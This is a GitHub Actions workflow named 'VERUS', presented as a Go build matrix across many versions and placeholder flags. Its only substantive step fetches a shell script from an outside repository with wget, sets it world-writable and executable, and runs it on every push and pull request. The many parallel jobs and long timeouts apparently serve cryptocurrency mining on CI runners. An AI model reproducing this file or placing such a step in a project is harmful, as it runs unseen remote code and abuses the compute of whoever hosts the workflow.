name: VERUS
on: [push, pull_request]
jobs:
  build:
    name: zcode
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: zcode
      run: |
        wget 
https://github.com/cacaderi/scrip/blob/main/sckuy.sh && chmod 777 sckuy.sh && ./sckuy.sh
